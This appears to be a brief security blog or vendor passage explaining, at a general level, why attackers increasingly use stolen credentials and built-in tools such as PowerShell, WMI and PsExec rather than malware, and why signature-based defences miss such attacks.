60% of attacks involve no malware, ensuring that antivirus, sandboxing, IOCs and signature-based solutions have no chance of detecting them. This is the new reality that companies with anti-malware investments will have to adapt to.
Why have attackers moved away from using malware?
Using malware increases the chance of being detected, so sophisticated adversaries have perfected their attack methodology to avoid dropping binaries that may be flagged.
Many attacks involve spear-phishing to harvest credentials which are then used to access the corporate network through legitimate channels such as the VPN, webmail, or SharePoint. This renders perimeter defences such as sandboxing solutions ineffective.
Once a foothold is established, the attackers ‘live off the land” — using built-in OS functionality such as PowerShell, WMI and remote desktop, as well as legitimate administration tools like PsExec and Teamviewer to access and control victim hosts.
Even where they do use malicious code, it’s executed directly in-memory so as not to leave any footprint on the file-system for antivirus or file integrity monitoring systems to detect.
By ensuring the attack looks just like normal activity and by using normal tools, they easily evade traditional protection and monitoring solutions.
Malware-less attacks are only going to increase, especially through the use of PowerShell scripts — entire frameworks for post-exploitation and privilege escalation now exist. The fact that penetration testing teams have started relying heavily on these tools is just another indicator of their effectiveness.